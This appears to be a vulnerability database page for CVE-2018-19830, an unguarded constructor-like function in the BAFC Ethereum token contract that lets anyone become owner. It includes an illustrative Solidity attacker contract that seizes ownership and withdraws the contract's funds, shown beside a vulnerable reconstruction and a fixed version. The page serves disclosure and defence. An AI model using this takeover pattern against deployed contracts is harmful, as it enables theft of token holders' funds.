CVE-2018-19830
Description
The UBSexToken() function of a smart contract implementation for Business Alliance Financial Circle (BAFC), a tradable Ethereum ERC20 token, allows attackers to change the owner of the contract, because the function is public (by default) and does not check the caller's identity.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The BAFC ERC-20 token contract has a public `UBSexToken()` function that acts as an unguarded constructor, allowing anyone to become the contract owner and drain its funds.
Vulnerability
The BAFC (Business Alliance Financial Circle) ERC-20 token smart contract declares what was meant to be its constructor as function UBSexToken() instead of using the Solidity constructor keyword (or, under compilers older than 0.4.22, a function whose name matches the contract name). Because the name does not match the contract, the compiler treats UBSexToken() as an ordinary function, and since it carries no visibility specifier it is public by default (Solidity before 0.5.0), so anyone can call it at any time, not only during deployment. The function sets owner = msg.sender without any access control, so any caller overwrites the contract owner. This vulnerability affects the original BAFC token contract as described in reference [1].
Exploitation
An attacker needs only to interact with the deployed BAFC contract on Ethereum and call the UBSexToken() function. No special privileges, authentication, or prior access are required. The function is public and lacks the onlyOwner modifier, so the attacker simply sends a transaction invoking UBSexToken() to become the new owner of the contract [1].
Impact
Once an attacker gains ownership by calling UBSexToken(), they can call any protected functions that rely on the onlyOwner modifier, such as withdraw() or withdrawForeignTokens(). This enables the attacker to transfer all Ether and other ERC-20 tokens held by the contract to their own address, resulting in complete theft of contract funds and a loss of control for the legitimate owners [1].
Mitigation
No patched version has been disclosed in the available references. The underlying issue is a flawed constructor pattern: developers should declare the constructor with the constructor keyword introduced in Solidity 0.4.22, which runs exactly once during deployment and is not callable afterwards (from Solidity 0.5.0 onward the compiler rejects contract-name constructors and requires an explicit visibility on every function, which catches this class of mistake at compile time). Since the deployed contract code is immutable on the blockchain, the only mitigation is for token holders to avoid or migrate away from the vulnerable BAFC contract. The CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1].
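The following is an added example, not the BAFC contract's source or any code from reference [1]: it reconstructs the flawed constructor pattern described in the Vulnerability section, shows the single-transaction takeover described under Exploitation and Impact, and places the corrected constructor form described under Mitigation beside it. The contract names VulnerableToken, Attacker and FixedToken, the ERC20Basic interface and the exact bodies of withdraw() and withdrawForeignTokens() are assumptions made for illustration; only the function name UBSexToken(), the owner = msg.sender assignment and the onlyOwner-guarded withdraw functions come from the page.

```solidity
pragma solidity ^0.4.24;

// Minimal ERC-20 surface needed by withdrawForeignTokens() (assumed here).
interface ERC20Basic {
    function balanceOf(address who) external view returns (uint256);
    function transfer(address to, uint256 value) external returns (bool);
}

// Vulnerable pattern (illustrative reconstruction, not the BAFC source):
// the function intended as the constructor does not match the contract
// name, so the compiler treats it as an ordinary function. With no
// visibility specifier it defaults to public (Solidity < 0.5.0), so
// anyone can call it after deployment.
contract VulnerableToken {
    address public owner;

    modifier onlyOwner() {
        require(msg.sender == owner, "caller is not the owner");
        _;
    }

    // Meant to run once at deployment; in fact callable by anyone, any time.
    function UBSexToken() {
        owner = msg.sender;
    }

    // Accept Ether so the contract holds something worth stealing.
    function () public payable {}

    function withdraw() public onlyOwner {
        owner.transfer(address(this).balance);
    }

    function withdrawForeignTokens(address tokenContract) public onlyOwner {
        ERC20Basic token = ERC20Basic(tokenContract);
        require(token.transfer(owner, token.balanceOf(address(this))));
    }
}

// Takeover and drain in one transaction (assumed attacker contract). A plain
// externally owned account achieves the same with two ordinary transactions.
contract Attacker {
    function takeover(VulnerableToken target) public {
        target.UBSexToken();   // owner = address(this); nothing checks the caller
        target.withdraw();     // onlyOwner now passes; Ether lands in this contract
    }

    function () public payable {}
}

// Hardened form: the constructor keyword (Solidity >= 0.4.22) runs exactly
// once, during deployment, and is not part of the deployed runtime code,
// so there is no post-deployment entry point that can reassign owner.
contract FixedToken {
    address public owner;

    modifier onlyOwner() {
        require(msg.sender == owner, "caller is not the owner");
        _;
    }

    constructor() public {
        owner = msg.sender;
    }

    function () public payable {}

    function withdraw() public onlyOwner {
        owner.transfer(address(this).balance);
    }
}
```

Compile with solc 0.4.24: VulnerableToken builds with only a "No visibility specified" warning on UBSexToken(), which is exactly the signal an auditor should treat as a finding. Under solc 0.5.0 and later the missing visibility is a hard error and contract-name constructors are rejected outright, so the same source would not compile; a quick review check for older codebases is to list every function that assigns owner and confirm each is either the constructor or guarded by onlyOwner.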
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Business Alliance Financial Circle (BAFC) / Business Alliance Financial Circle (BAFC)
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.